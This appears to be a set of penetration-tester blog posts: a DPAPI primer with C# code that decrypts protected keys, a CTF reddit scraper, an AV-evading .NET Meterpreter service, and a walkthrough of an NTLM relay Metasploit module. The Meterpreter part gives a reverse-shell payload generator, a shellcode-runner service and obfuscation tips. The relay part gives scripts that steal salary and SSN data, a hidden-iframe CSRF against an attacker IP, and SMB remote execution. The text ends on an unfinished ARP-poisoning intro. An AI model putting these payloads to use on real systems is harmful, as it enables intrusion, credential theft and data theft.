DPAPI Primer for Pentesters

Update 6 July 2013 – fixed info when user store may decrypt on separate machine

Understanding DPAPI is not that complicated, although the amount of the documentation can be daunting. There is a lot of excellent “under the hood” DPAPI stuff available (e.g. Stealing Windows Secrets Offline http://www.blackhat.com/html/bh-dc-10/bh-dc-10-briefings.html) But is it easier to steal these secrets online? The answer is yes, probably.

DPAPI’s purpose in life is to store secrets. These are frequently symmetric crypto keys used to encrypt other things. For example, typical use cases for these protected keys are for them to encrypt anything from saved passwords in an RDP connection manager on a Desktop to encrypting sensitive info in a database (e.g. bank account numbers). Using DPAPI to store sensitive info (or store keys that encrypt sensitive info) is good practice.

There are a few concepts to understand before using DPAPI

  • You can encrypt/decrypt the secrets using either a “user store” or a “machine store”. This is where the entropy comes from. What this means is:
    • If you use the user store, then this secret may only be read by this user on this machine. In the testing I’ve done, it cannot be read by the same domain user on a different machine either.
    • If you use the machine store, any user on the machine is able to decrypt the secrets – including Network User (e.g. IIS), Guest, etc. In the testing I’ve done, this is certainly less restrictive/secure than the user store (user store takes into account the machine also).
  • Secondary Entropy: One argument to the DPAPI calls is the secondary entropy argument. Using this, an application needs to know this secret before the data is decrypted.

A few common misconceptions

  • I’ve heard from several people how the user’s login password is used for entropy. This does not really tell the whole story.  An attacker does not need to know the password to retrieve DPAPI, they just need to be executing with the account/machine. This is often an easier problem than retrieving a password.
  • It can be easy to mix up DPAPI and other things that make use of DPAPI. For example, the credential store is an API that uses DPAPI

A pretend good setup

If things are done basically correct, then a good scheme might be something like this:

  • There’s a server database that stores encrypted bank account numbers 
    • It needs to decrypt these for regular use
    • The encryption/integrity of this data uses a good authenticated encryption scheme, say AES/GCM.
  • The question is, where do we store the key?
    • We use DPAPI in user mode to encrypt the data
    • The user used that can access the data is a locked down domain service account with limited permissions. For example, the service account can’t log in to the box, and is a different user than the database runs as.
    • The DPAPI encrypted blob is stored in an ACLed part of the registry so only the service account has access

An overly simplified example might be the following, which runs at deployment time.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Microsoft.Win32;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Security.AccessControl;

namespace encrypt_dpapi
{
    class Program
    {
        private const string MASTER_REG_KEY_PATH = @"SOFTWARE\Contoso\dbapp";
        private const string MASTER_REG_KEY_NAME = @"bankkey";
        private const string SERVICE_ACCT = @"EVIL\_mservice";

        public static void WriteMachineReg(string path, string valuename, string value)
        {
            RegistryKey bank_reg = Registry.LocalMachine.CreateSubKey(MASTER_REG_KEY_PATH);

            //set the ACLs of the key so only service account has access
            RegistrySecurity acl = new RegistrySecurity();
            acl.AddAccessRule(new RegistryAccessRule(SERVICE_ACCT, RegistryRights.FullControl, AccessControlType.Allow));
            acl.SetAccessRuleProtection(true, false);

            bank_reg.SetAccessControl(acl);

            //write the key
            bank_reg.SetValue(MASTER_REG_KEY_NAME, value);

            bank_reg.Close();


        }

        //we want the symmetric key to be randomly generated and no one to even know it!
        public static byte[] genSymmetricKey(int size)
        {
            RNGCryptoServiceProvider rng = new RNGCryptoServiceProvider();
            byte[] buf = new byte[size];
            rng.GetBytes(buf);
            return buf;
        }

        static void Main(string[] args)
        {
            //check that we're running as the correct service account
            string user = WindowsIdentity.GetCurrent().Name;
            if (!user.Equals(SERVICE_ACCT, StringComparison.OrdinalIgnoreCase))
            {
                Console.WriteLine("Error: must run as " + SERVICE_ACCT + " Account");
                Console.WriteLine(user);
                Console.WriteLine("Exiting program");
                return;
            }


            //generate a random key we'll use to encrypt bank accounts
            byte[] key = genSymmetricKey(256);
            Console.WriteLine("Key " + Convert.ToBase64String(key));

            byte[] additional_entropy = {0x41, 0x41, 0x41, 0x41};

            //dpapi encrypt the key
            byte[] enc_key = ProtectedData.Protect(key, additional_entropy, DataProtectionScope.CurrentUser);

            //dpapi encrypted key is saved in base64
            WriteMachineReg(MASTER_REG_KEY_PATH, MASTER_REG_KEY_NAME, Convert.ToBase64String(enc_key));


        }
    }
}

If I run this, I get

>encrypt_dpapi.exe
Key 721HLUm5n9/0hpAFtBl3Jvn2jJ+KM3z4mPKfyLCHOAZyx/JUP6qs+DCVpwWCqbmB3CZc+o6qXeY4
T+ivRkgn6ZLUSTInuhIh96qRPC9DXZD/ALUg5NTdoWtxYaSq4uOeF6ywh1hRyLyVKSopdHkR4ZycFKV9
KIIX+O5pKK/sYBRwvkhnIwpbLO3Qps7FK5x3wNlj5OwLOfl31bs8rE0Qk/yzvhzT5+zF7BJx/j/qUCGa
g8f8PGOBhi/Ch0lGDWW203rbwdfMC8fmHAYfR4FdlU2L90lmEOCY8Mgjno4ScAGgKPyFS74TLaufLKiz
tjBaAKt89JGaNHOizWvdIGsoMw==

This is the base64 version of the key used to decrypt bank account numbers – so ultimately what we as attackers want. But if I look in the registry (where this info is stored) I get something completely different

dpapi_registry

 

So how can we get decrypted Bank Account Numbers?

Say we’re an attacker and we have system privs on the box above. How can we decrypt the bank account numbers?

There’s probably more than one way. One method may be to scan memory and extract the key from memory (but if it uses safe memory protection it may not be in there long…). Another method may be to attach a debugger to the app and extract it that way. For a production pentest, one of the most straightforward ways just to use DPAPI again to decrypt the data.

using System;
using System.Text;
using System.Runtime.InteropServices;
using System.ComponentModel;
using Microsoft.Win32;
using System.Security.Cryptography;



namespace decrypt_dpapi_reg
{

    public class registry
    {
        public static string ReadMachineReg(string path, string valuename)
        {
            return (string)Registry.GetValue(path, valuename, "problem");
        }
    }

    class Program
    {

        private const string MASTER_REG_KEY_PATH = @"SOFTWARE\Contoso\dbapp";
        private const string MASTER_REG_KEY_NAME = @"bankkey";
        private const string SERVICE_ACCT = @"EVIL\_mservice";   


        public static byte[] UnprotectUser(string data)
        {
            try
            {
                byte[] additional_entropy = { 0x41, 0x41, 0x41, 0x41 };
                byte[] encryptData = Convert.FromBase64String(data);
                return ProtectedData.Unprotect(encryptData, additional_entropy, DataProtectionScope.CurrentUser);
                
            }
            catch (CryptographicException e)
            {
                Console.WriteLine("Data was not decrypted. An error occurred.");
                Console.WriteLine(e.ToString());
                return null;
            }
        }


        static void Main(string[] args)
        {
            //must be run as a user with access on a machine with access
            string s = registry.ReadMachineReg(@"HKEY_LOCAL_MACHINE\" + MASTER_REG_KEY_PATH, MASTER_REG_KEY_NAME);

            Console.WriteLine("DPAPI encrypted key: " + s);
            Console.WriteLine();

            Console.WriteLine("DPAPI encrypted key: " + BitConverter.ToString(Convert.FromBase64String(s)));
            Console.WriteLine();

            byte[] decryptedbytes = UnprotectUser(s);
            Console.WriteLine(Convert.ToBase64String(decryptedbytes));
            
        }
    }

}

If we try to run this as another user, what happens? It won’t work. We’ll get an exception like this:

System.Security.Cryptography.CryptographicException: Key not valid for use in specified state.

   at System.Security.Cryptography.ProtectedData.Unprotect(Byte[] encryptedData,Byte[] optionalEntropy, DataProtectionScope scope)
   at decrypt_dpapi_reg.Program.UnprotectUser(String data)

DPAPI uses the user entropy to encrypt the data, so we need to compromise the user. But what happens if we copy out the registry value to another machine and try to DPAPI to decrypt the secrets on another box as the EVIL\_mservice account, what happens?

It turns out in my testing this does not work, and I got the same exception as a bad user on the same machine. I needed to run on the same machine that encrypted the key. UPDATE However, there are several reasons it may not work, but it should work overall. From http://support.microsoft.com/kb/309408#6

DPAPI works as expected with roaming profiles for users and computers that are joined to an Active Directory directory service domain. DPAPI data that is stored in the profile acts exactly like any other setting or file that is stored in a roaming profile. Confidential information that the DPAPI helps protect are uploaded to the central profile location during the logoff process and are downloaded from the central profile location when a user logs on.
For DPAPI to work correctly when it uses roaming profiles, the domain user must only be logged on to a single computer in the domain. If the user wants to log on to a different computer that is in the domain, the user must log off the first computer before the user logs on to the second computer. If the user is logged on to multiple computers at the same time, it is likely that DPAPI will not be able to decrypt existing encrypted data correctly.
DPAPI on one computer can decrypt the master key (and the data) on another computer. This functionality is provided by the user’s consistent password that is stored and verified by the domain controller. If an unexpected interruption of the typical process occurs, DPAPI can use the process described in the “Password Reset” section later in this article.
There is a current limitation with roaming profiles between Windows XP-based or Windows Server 2003-based computers and Windows 2000-based computers. If keys are generated or imported on a Windows XP-based or Windows Server 2003-based computer and then stored in a roaming profile, DPAPI cannot decrypt these keys on a Windows 2000-based computer if you are logged on with a roaming user profile. However, a Windows XP-based or Windows Server 2003-based computer can decrypt keys that are generated on a Windows 2000-based computer.

Blackbox Detection

DPAPI can be really tough to do with a complete blackbox. As part of an engagement, if I’ve compromised this far, I usually go hunting for the source which is frequently less protected than the DPAPI protected asset. But one giveaway that you’re even dealing with DPAPI is if a blob has a structure similar to the following:

dpapi_format

We can be a bit more scientific about this. Comparing two runs of the same program above gives the following bytes that are the same (note that since the key itself is random but a constant length, this reveals a bit about the structure). This is documented better elsewhere I’m sure, but if something looks quite a bit like this, it should give you a quick idea if you’re dealing with a dpapi encrypted blob.

01-00-00-00-D0-8C-9D-DF-01-15-D1-11-8C-7A-00-C0-4F-C2-97-EB
-01-00-00-00-08-DC-D9-58-94-2E-C9-4A-9C-59-12-F1-60-EA-6C-56-00-00-00-00-02-00-0
0-00-00-00-03-66-00-00-C0-00-00-00-10-00-00-00-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-
xx-xx-xx-xx-xx--00-00-00-00-04-80-00-00-A0-00-00-00-10-00-00-00-xx.....

Dan Guido’s Favorite Food? (A script to search reddit comments)

CSAW CTF was fun. My team (ACMEPharm) solved all the challenges but network 400, which was a dumb challenge anyway :P

One of the other challenges we struggled with was a recon one: “what is Dan Guido’s favorite food”? There was also a hint that said something like “A lot of our users use reddit”. Since we had already solved all the other recon challenges and none required reddit, we were fairly certain this is where to look. Looking at dguido’s page there are tons of links- he’s part of the 5 year club.

Reddit has a robots.txt that tells search engines not to search it, and also a user’s comments aren’t indexed so they aren’t searchable using it’s search. This was the motivation for me to scrape a user’s comments so I could search through them locally.

#!/usr/bin/python

import urllib
import sys
import time

class AppURLopener(urllib.FancyURLopener):
    version = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1"

urllib._urlopener = AppURLopener()

class redditScrape:
    def __init__(self, startpage):
        self.thispage = startpage
        self.counter = 1

    def getInfo(self):
        while 1:
            print "Fetching ", self.thispage
            f = urllib.urlopen(self.thispage)
            data = f.read()
            self.saveHtml(data)
            self.getNextPage(data)
            #reddit asks for only one request every two seconds
            time.sleep(2)

    def saveHtml(self, data):
        f = open(str(self.counter), "w")
        f.write(self.thispage + "\n\n")
        f.write(data)
        f.close()

    def getNextPage(self, data):
        index = data.find("rel=\"nofollow next\"")
        if index == -1:
            print "Search done"
            sys.exit(0)
        else:
            hrefstart = data.rfind("href", 0, index) + 6
            hrefend = data.find("\"", hrefstart)
            self.thispage = data[hrefstart: hrefend]
            self.counter += 1

a = redditScrape("http://www.reddit.com/user/dguido")
a.getInfo()

Then I would

grep -Ri "cheese" .
grep -Ri "pizza" .
...

Unfortunately the answer turned out to be in another person’s comment so my script missed it, but someone else on my team found it not long after… in a thread I was blabbering in.

AV Evading Meterpreter Shell from a .NET Service

Update: I tried this in April 2013, and it still works quite well if you obfuscate the .net (e.g. using dotfuscator or there are plenty of free ones). I still use the generic idea for SMB type things, like NTLM relaying. That said, for simply evading AV, I highly recommend going the powershell route instead. Powersploit has meterpreter connectback built in, so you don’t even need to do anything. It’s awesome https://github.com/mattifestation/PowerSploit

Quite a few successful attacks rely on creating a malicious service at some point in the attack chain. This can be very useful for a couple reasons. First, in post exploitation scenarios these services are persistent, and (although noisy) these can be set to start when a connection fails or across reboots. Second, malicious services are also an extremely common way that boxes are owned in the first place – it’s part of how psexec and smb NTLM relaying work. In Metasploit by default, these are exploit modules most commonly used by selecting from their available payloads. One thing people may not realize is that these payloads are just turned into service binaries and then executed. You don’t need to necessarily use low level machine code – your “shellcode” can just be written in .NET if you want.

The strategy I’ll use here is to create a stage 1 .NET meterpreter service that connects back to our stage 2 host.

Maybe the easiest way to create a service is to use Visual Studio. Go to new project, and select Window Service, which should give you a nice skeleton.

Generate our stage 1 and put it in a C# byte array format. I wrote a python script to do this.

#!/usr/bin/python

###
# simple script that generates a meterpreter payload suitable for a .net executable
###

import argparse
import re
from subprocess import *

parser = argparse.ArgumentParser()
parser.add_argument('--lhost', required=True, help='Connectback IP')
parser.add_argument('--lport', required=True, help='Connectback Port')
parser.add_argument('--msfroot', default='/opt/metasploit/msf3')
args = parser.parse_args()


def create_shellcode(args):
    msfvenom = args.msfroot + "/msfvenom"
    msfvenom = (msfvenom + " -p windows/meterpreter/reverse_tcp LHOST=" + args.lhost + " LPORT=" + args.lport + " -e x86/shikata_ga_nai -i 15 -f c")
    msfhandle = Popen(msfvenom, shell=True, stdout=PIPE)
    try:
        shellcode = msfhandle.communicate()[0].split("unsigned char buf[] = ")[1]
    except IndexError:
        print "Error: Do you have the right path to msfvenom?"
        raise
    #put this in a C# format
    shellcode = shellcode.replace('\\', ',0').replace('"', '').strip()[1:-1]
    return shellcode

print create_shellcode(args)

Next, we can copy/paste our shellcode into a skeleton C# service, and execute it by virtualallocing a bit of executable memory and creating a new thread. One of my buddies pointed me at http://web1.codeproject.com/Articles/8130/Execute-Native-Code-From-NET, which was helpful when writing this.

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Diagnostics;
using System.Linq;
using System.ServiceProcess;
using System.Text;
using System.Runtime.InteropServices;

namespace metservice
{
    public partial class Service1 : ServiceBase
    {
        public Service1()
        {
            InitializeComponent();
        }

        protected override void OnStart(string[] args)
        {
            // native function's compiled code
            // generated with metasploit
            byte[] shellcode = new byte[] {
0xbf,0xe2,0xe6,0x44,.... (stage 1 shellcode)
                };

            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length,
                                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // prepare data


            IntPtr pinfo = IntPtr.Zero;

            // execute native code

            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);

      }

        private static UInt32 MEM_COMMIT = 0x1000;

        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;


        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
             UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress,
                              UInt32 dwSize, UInt32 dwFreeType);

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(

          UInt32 lpThreadAttributes,
          UInt32 dwStackSize,
          UInt32 lpStartAddress,
          IntPtr param,
          UInt32 dwCreationFlags,
          ref UInt32 lpThreadId

          );
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(

          IntPtr hHandle,
          UInt32 dwMilliseconds
          );
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(

          string moduleName

          );
        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(

          IntPtr hModule,
          string procName

          );
        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(

          string lpFileName

          );
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();


        protected override void OnStop()
        {
        }
    }
}

We still need to create our stage 2 listener on our attacker box from within metasploit.

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LPORT 443
...

Now we have our service, which when added and started will connect back to our listening attacker box. At which point we have a meterpreter shell running as system.

This is close to the exact same thing I did here with my http_ntlmrelay module. Using that, we have two steps. One is uploading our malicious .net service, and the second is starting that service.

use auxiliary/server/http_ntlmrelay
#SMB_PUT our malicious windows service (named metservice.exe) onto the victim
set RHOST mwebserver
set RPORT 445
set RTYPE SMB_PUT
set URIPATH /1
set RURIPATH c$\\Windows\\rla7cu.exe
set FILEPUTDATA /root/ntlm_demo/smb_pwn/metservice.exe
run
#Execute the malicious windows service
set RTYPE SMB_PWN
set RURIPATH %SystemRoot%\\rla7cu.exe
set URIPATH /2
run

Out of the box, this service already evades most AV (there are 0 detections when I uploaded to virustotal).

However, as AV companies do, they could update their stuff to figure out a way of detecting this. In the middle of a pentest, I already got an email from a concerned stakeholder asking about this service, which I had named “gonnaownyou” or something (yes, I know, sloppy, but I can be loud and arrogant). This concerned stake holder said they were in the process of analyzing the binary to determine if it was malicious. Surprised they had detected anything, I immediately dropped the binary into reflector, and it really couldn’t be more obvious that it is in fact malicious. I mean, my byte array is named “shellcode”, even in reflector.

As an attacker, the good news is we’re in .NET land now. It’s really very easy to modify C# compared to low level shellcode. All our real shellcode is just a string, which we can hide however the hell we want – we could easily download it from somewhere, use encryption, etc. with only a few code changes. In fact, we might not even have to modify our code above at all. There is an entire legitimate market to make managed code tough to analyze to protect IP and whatnot. Think dotfuscator. I’m not an AV guy – I usually know just enough to evade it – but it seems to me that for an AV company to detect our dotfuscated shellcode would be a difficult problem.

You know how it’s often referred to as an arms race/escalation game when people try to bypass AV, and then AV companies try to detect that? You know how they say basically the same thing about code obfuscating type solutions? Well, I don’t like spending my time evading AV, so I have this funny fantasy where I pit the code obfuscator people against the AV companies and they escalate their approaches against each other, leaving me out of the escalation equation completely :)

Metasploit Generic NTLM Relay Module

I recently put in a pull request for a Metasploit module I wrote that does NTLM relaying (I recommend this post for some background). I also have a time slot for a tool arsenal thing at blackhat. Here’s the description:

NTLM auth blobs contain the keys to the kingdom in most domain environments, and relaying these credentials is one of the most misunderstood and deadly attacks in a hacker’s corporate arsenal. Even for smart defenders it’s almost like a belief system; some people believe mixed mode IIS auth saves them, NTLMv2 is not exploitable, enabling the IIS extended protection setting is all you need, it was patched with MS08-068, you have to be in the middle, you have to visit a website, you have to be an administrator for the attack to matter, etc. etc.

http_ntlm_relay is a highly configurable Metasploit module I wrote that does several very cool things, allowing us to leverage the awesomeness of Metasploit and show the way for these non-believers:

  • HTTP -> HTTP NTLM relay with POST, GET, HTTPS support.
  • HTTP -> SMB NTLM relay with ENUM_SHARES, LS, WRITE, RM, and EXEC support. This extended support allows a lot of interesting attacks against non admins and multiple browsers that aren’t currently available in Metasploit.
  • NTLMv2 support, which means that this attack now works a lot more often on modern windows environments.
  • Mutex support allowing information from one request to be used in a future request. A simple example of this would be a GET to retrieve a CSRF token used in a POST. A more complex example would be an HTTP GET request to recover computer names, and then using that information to SMB relay to those computers for code execution.

It will be open source and I’ll try my darndest to get it included in Metasploit proper before Blackhat.

With this module, I made a choice for flexibility over some other things. Although basic usage is fairly straightforward, some of the more advanced functionality might not be. This post will give some usage examples. I have desktop captures of each example, full screen and HD those suckers if you want to see what’s going on.

Stealing HTTP Information

Corporate websites that use NTLM auth are extremely common, whether they’re sharepoint, mediawiki, ERP systems, or (probably most commonly) homegrown applications. To test my module out, I wrote a custom application that uses Windows Auth. I did it this way so I could easily reconfigure without too much complexity (although I have tested similar attacks against dozens of real sharepoint sites, mediawiki, and custom webpages). This simple example is an app that displays some information about the user visiting. Think of it as an internal paystub app that HR put up.

IIS is set to authenticate with Windows auth:

All domain accounts are authorized to see their own information, which it grabs out of a DB:


<asp:SqlDataSource
    id="SqlDataSource1"
    runat="server"
    DataSourceMode="DataReader"
    ConnectionString="<%$ ConnectionStrings:ApplicationServices%>">

...

Username.Text = Page.User.Identity.Name;
String username = Page.User.Identity.Name;

SqlDataSource1.SelectCommand = "SELECT * FROM Employee WHERE username='" + Page.User.Identity.Name + "'";
GridView1.DataBind();

So let’s attack this, shall we? I made the following resource file:

#This simple resource demonstrates how to collect salary info from an internal HTTP site authed with NTLM
#to extract run the ballance_extractor resource

unset all
use auxiliary/server/http_ntlmrelay
set RHOST mwebserver
set RURIPATH /ntlm/EmployeeInfo.aspx
set SYNCID empinfo
set URIPATH /info
run

Now our HTTP server sits around and waits for someone to connect. Once someone does and sends their NTLM creds, the credentials are passed along to the web server, and the data is saved to the notes database. We can look at this HTML, or with the data at our disposal, we can extract the relevant info with a resource script.

#extract the mealcard information from the database


<ruby>
#data is the saved response
def extract_empinfo(data)
	fdata = []
	bleck = data.body
	empdata = bleck.split('<td>')[2..-1]
	empdata.each do |item|
		fdata.push(item.split('</td>')[0])
	end
	return (fdata)
end


framework.db.notes.each do |note|
	if (note.ntype == 'ntlm_relay')
		begin
			#SYNCID was set to "empinfo" on the request that retrieved the relavent values
			if note.data[:SYNCID] == "empinfo"
				empinfo = extract_empinfo(note.data[:Response])
				print_status("#{note.data[:user]}: Salary #{empinfo[0]}  |  SSN: #{empinfo[4]}")
			end
		rescue
			next
		end
	end
end
</ruby>


Here’s that in action.

HTTP CSRF

Whether they be HTTP requests or something else, a lot of the really interesting attacks simply require more than one request. Look at any time we want to POST and change data. If the website has protection against CSRF, this should take at least two requests – one to grab the CSRF token and another to do the POST that changes state.

In my dummy app, a member of the “cxo” active directory security group has permission to edit anyone’s salary. This extreme functionality for a privileged few is super common. Think ops administration consoles, help desk type tools, HR sites, etc. The goal of this attack is to change “mopey’s” salary to -$100 after a member of the cxo group visits our site.

The first step for me is just to run the interface as normal through an HTTP proxy. In this case, it took three requests for me to edit the salary, and each request requires data to be parsed out – namely the VIEWSTATE and EVENTVALIDATION POST values. HTTP_ntlmrelay was designed to support this sort of scenario. We’ll be using the SYNCFILE option to extract the relevant information and update the requests dynamically.

Here’s the resource file


#This demonstrates how to do a CSRF against an "HR" app using NTLM for auth
#It grabs the secret from a GET request, then a POST request and uses that secret in a subsequent POST request
#This is a semi-advanced use of this auxiliary module, demonstrating how it can be customized

#to use, from msf run this resource file, and force a victim to visit a page that forces the 3 requests
#to modify the content put in the wiki, edit extract_2.rb

unset all
use auxiliary/server/http_ntlmrelay
set RHOST mwebserver
set RTYPE HTTP_GET
set RURIPATH /ntlm/Admin.aspx
set URIPATH /grabtoken1
set SYNCID csrf
run
set SYNCID csrf2
set URIPATH /grabtoken2
set RTYPE HTTP_POST
set SYNCFILE /root/ntlm_relay/bh_demos/http_csrf/extract_1.rb
set HTTP_HEADERFILE /root/ntlm_relay/bh_demos/http_csrf/headerfile
run
unset SYNCID
set URIPATH /csrf
set SYNCFILE /root/ntlm_relay/bh_demos/http_csrf/extract_2.rb
set HTTP_HEADERFILE /root/ntlm_relay/bh_demos/http_csrf/headerfile
run

extract_1.rb extracts the secret information from the first GET request, which the second request uses. Note the requests go one at a time – you have a guarantee one request will completely finish before the next one begins.

# cat extract_1.rb
#grab the request with the ID specified

#extract the viewstate value
def extract_viewstate(data)
	bleck = data.body
	viewstate = bleck.split('"__VIEWSTATE"')[-1].split("\" />")[0].split('value="')[1].strip
	return viewstate
end

#extract the Eventvalidation
def extract_eventvalidation(data)
	bleck = data.body
	eventvalidation = bleck.split('"__EVENTVALIDATION"')[-1].split("\" />")[0].split('value="')[1].strip
	return eventvalidation
end

framework.db.notes.each do |note|
	if (note.ntype == 'ntlm_relay')
		#SYNCID was set to "csrf" on the request that retrieved the relavent values
		if note.data[:SYNCID] == "csrf"
			print_status("Found GET request containing CSRF stuff. Extracting...")
			viewstate = extract_viewstate(note.data[:Response])
			eventvalidation = extract_eventvalidation(note.data[:Response])

			datastore['FINALPUTDATA'] = (
				"__EVENTTARGET=ctl00%24MainContent%24GridView1&__EVENTARGUMENT=Edit%243&__VIEWSTATE=" +
				Rex::Text.uri_encode(viewstate) + "&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=" +
				Rex::Text.uri_encode(eventvalidation)
				)
			puts(datastore['FINALPUTDATA'])
		end
	end
end

extract2.rb is nearly identical, except the POST data needs our CSRF values and the requests we’re parsing are different (we have a separate syncid we’re looking for).

# cat extract_2.rb
#grab the request with the ID specified

new_salary = "-100"
victim = "EVIL%5Cmopey"

#extract the viewstate value
def extract_viewstate(data)
	bleck = data.body
	viewstate = bleck.split('"__VIEWSTATE"')[-1].split("\" />")[0].split('value="')[1].strip
	return viewstate
end

#extract the Eventvalidation
def extract_eventvalidation(data)
	bleck = data.body
	eventvalidation = bleck.split('"__EVENTVALIDATION"')[-1].split("\" />")[0].split('value="')[1].strip
	return eventvalidation
end

framework.db.notes.each do |note|
	if (note.ntype == 'ntlm_relay')
		#SYNCID was set to "csrf" on the request that retrieved the relavent values
		if note.data[:SYNCID] == "csrf2"
			print_status("Found Second request containing CSRF stuff. Extracting...")
			viewstate = extract_viewstate(note.data[:Response])
			eventvalidation = extract_eventvalidation(note.data[:Response])

			datastore['FINALPUTDATA'] = (
				"__EVENTTARGET=ctl00%24MainContent%24GridView1%24ctl05%24ctl00&__EVENTARGUMENT=&__VIEWSTATE=" +
				Rex::Text.uri_encode(viewstate) + "&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=" +
				Rex::Text.uri_encode(eventvalidation) + "&ctl00%24MainContent%24GridView1%24ctl05%24ctl02=" +
				victim + '&ctl00%24MainContent%24GridView1%24ctl05%24ctl03=' + new_salary
				)
			puts(datastore['FINALPUTDATA'])
		end
	end
end

The HTTP_HEADERS options is easier to explain. In the file, it’s just a list of HTTP_HEADERS…

# cat headerfile
Content-Type: application/x-www-form-urlencoded

Lastly, I put all three requests in a nice rick roll package. This is the site the victim will visit with their browser in the final attack.

<iframe src="http://192.168.138.132:8080/grabtoken1" style='position:absolute; top:0;left:0;width:1px;height:1px;'></iframe>
<iframe src="http://192.168.138.132:8080/grabtoken2" style='position:absolute; top:0;left:0;width:1px;height:1px;'></iframe>
<iframe src="http://192.168.138.132:8080/csrf" style='position:absolute; top:0;left:0;width:1px;height:1px;'></iframe>

<h1>Never gonna Give you Up!!!</h1>
<iframe width="420" height="315" src="http://www.youtube.com/embed/dQw4w9WgXcQ" frameborder="0" allowfullscreen></iframe>


Here’s the whole thing in action. In this video I fail the rickroll due to my lack of IE flash, but the attack works. Despite good CSRF protection, mopey’s salary is successfully modified by visiting a malicious website.

Yes, it’s kind of complicated to parse HTML and extract values, but that’s just the nature of the problem. I’ve done this several times. In this archive there’s a mediawiki POST that edits an NTLM authed page. It’s similar to above, but requires a multipart form and a authentication cookie (which you can use the headerfile option for). HTTP_ntlmrelay is designed to do one request at a time, but multiple requests can easily be stacked on the browser side (like I did here with the hidden iframes).

SMB File Operations

There’s (usually) no reason you can’t use a browser’s NTLM handshake to authenticate to an SMB share, and from there, all the regular file operations you’d expect should be possible. Because there’s no custom HTML to parse or anything, this is actually a lot simpler to demonstrate. The setup is the same as above, a fully patched browser client from one machine being relayed to a separate fully patched default win 2008R2 domain machine (mwebserver).

#This simple resource simply enums shares, reads, writes, ls, and pwn

unset all
use auxiliary/server/http_ntlmrelay
set RHOST mwebserver
set RPORT 445
#smb_enum
set RTYPE SMB_ENUM
set URIPATH smb_enum
run
#SMB_PUT
set RTYPE SMB_PUT
set URIPATH smb_put
set RURIPATH c$\\secret.txt
set PUTDATA "hi ima secret"
set VERBOSE true
run
#smb_ls
unset PUTDATA
set RTYPE SMB_LS
set URIPATH smb_ls
set RURIPATH c$\\
run
#smb_get
set RTYPE SMB_GET
set URIPATH smb_get
set RURIPATH c$\\secret.txt
run
#smb_rm
set RTYPE SMB_RM
set URIPATH smb_rm
set RURIPATH c$\\secret.txt
run

Another cool thing. With current attacks like the smb_relay module you pretty much need to be an admin, and that’s still true here if you want to start services. But any Joe that can authenticate might be able to write/read to certain places. Think about how corporate networks might do deployment with development boxes, distribute shared executables, transfer shares, etc and you might get the idea. Below I replace somebody’s winscp on their Desktop with something that has a winscp icon and just does a system call to calculator (this is from a different lab but the idea applies anywhere)

SMB Pwn

How does psexec work? Oh yeah, it uses SMB :) You astute folks may have known this all along, but showing this off to people… they’re just amazed at how pwned they can get by visiting a website.

This can be super simple. Here’s an example that tries to execute calc.exe. It’s flaky on 2008r2 because windows is trying to start calc as a service… but it still pretty much works if you refresh a few times.

#This simple resource simply executes calculator

unset all
use auxiliary/server/http_ntlmrelay
set RHOST mwebserver
set RTYPE SMB_PWN
set RPORT 445
set RURIPATH %SystemRoot%\\system32\\calc.exe
set URIPATH smb_pwn

MUCH more reliable is to create a service that has at least onstart, onstop methods. This next video has three requests, one to upload a malicious binary with smb_put, a second call to smb_pwn, and a third to remove the binary. This is similar to what the current metasploit smb_relay and psexec modules do automatically. Here I upload a meterpreter service binary that connects back to my stage 2, and then executes a packed wce to dump the user’s password in cleartext.

This is my favorite demo, because it shows the user’s cleartext passwords from just visiting a website or viewing an email.

Conclusions

So like I mentioned before, I have a tool arsenal thing next week at Blackhat, so that would be cool if people stopped by to chat. Also, at the time of this writing this hasn’t made it into Metasploit proper yet, but I hope it makes it eventually! Egypt gave me a bunch of good fixes to do. I’ve made most the changes, I just haven’t committed them yet (but I probably will tomorrow, barring earthquakes and whatnot).

Mitigations are a subject I don’t cover here. I think this deserves a post of its own, since misconceptions about relaying are so prevalent. Until then, this might be a good starting point: http://technet.microsoft.com/en-us/security/advisory/973811.

Some Practical ARP Poisoning with Scapy, IPTables, and Burp

ARP poisoning is a very old attack that you can use to get in the middle. A traditional focus of attacks like these is to gather information (whether that information is passwords, auth cookies, CSRF tokens, whatever) and there are sometimes ways to pull this off even against SSL sites (like SSL downgrades and funny domain names). One area I don’t think gets quite as much attention is using man in the middle as an active attack against flaws in various applications. Most of the information is available online, but the examples I’ve seen tend to be piecemeal and incomplete.

Getting an HTTP proxy in the Middle

In this example I’m going to use Backtrack, scapy, and Burp. While there are a lot of cool tools that implement ARP poisoning, like Ettercap and Cain & Abel, it’s straightforward to write your own that’s more precise and easier to see what’s going on.

Here’s a quick (Linux only) script that does several things. 1) it sets up iptables to forward all traffic except destination ports 80 and 443, and it routes 80 and 443 locally 2) at a given frequency, it sends arp packets to a victim that tells the victim to treat it as the gateway IP.

